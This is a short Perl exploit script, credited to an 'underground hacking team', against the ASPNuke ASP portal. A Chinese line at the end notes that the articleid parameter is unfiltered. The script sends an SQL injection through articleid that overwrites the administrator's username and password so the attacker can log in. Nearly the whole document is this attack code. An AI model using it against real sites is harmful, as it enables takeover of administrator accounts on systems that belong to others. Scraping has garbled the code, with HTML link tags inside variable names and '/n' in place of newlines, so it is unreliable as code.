#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
######################################################################################
# E<a href="http://hackbase.com/skill/XP" target="_blank">XP</a>LOIT FOR: ASPNuke ASP Portal
#
# Expl0it By: [email]mh_p0rtal@Yahoo.com[/email]
#
# Discovered By: Trap-Set Underground Hacking Team (oil_KarchacK)
#
######################################################################################
# GR33tz T0 ==> Alpha_programmer -- oil_Karchack -- the_CephaleX -- Str0ke
# And Iranian Security & Technical Sites:
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team , Hat-squad security team & Simorgh-ev Security Team
######################################################################################
use IO::Socket;
if (@ARGV < 1)
{
print "/n==========================================/n";
print " /n -- Exploit By mh_p0rtal --/n/n";
print " Trap-Set Underground Hacking Team /n/n";
print " Usage:ASPNuke.pl <T4rg3t> /n/n";
print "==========================================/n/n";
print "Examples:/n/n";
print " ASPNuke.pl [url]www.Site.com[/url] /n";
exit();
}
my <a href="#" target="_blank">$</a>host = <a href="#" target="_blank">$</a>ARGV[0];
my <a href="#" target="_blank">$</a>remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => <a href="#" target="_blank">$</a>host,
PeerPort => "80" );
unless (<a href="#" target="_blank">$</a>remote) { die "C4nn0t C0nn3ct to <a href="#" target="_blank">$</a>host" }
print "[+]C0nn3cted/n";
<a href="#" target="_blank">$</a>addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0/n";
<a href="#" target="_blank">$</a>addr .= "Host: <a href="#" target="_blank">$</a>host/n/n/n/n";
print "/n";
print <a href="#" target="_blank">$</a>remote <a href="#" target="_blank">$</a>addr;
print "[+]Wait...";
sleep(5);
print "Wait For Changing Password .../n";
print "[+]OK , Now Login With : /n";
print "Username: trapset/n";
print "Password: trapset/n/n";
说明,这是一个perl小脚本。我们可以看出程序对article.asp中的articleid没有做过滤。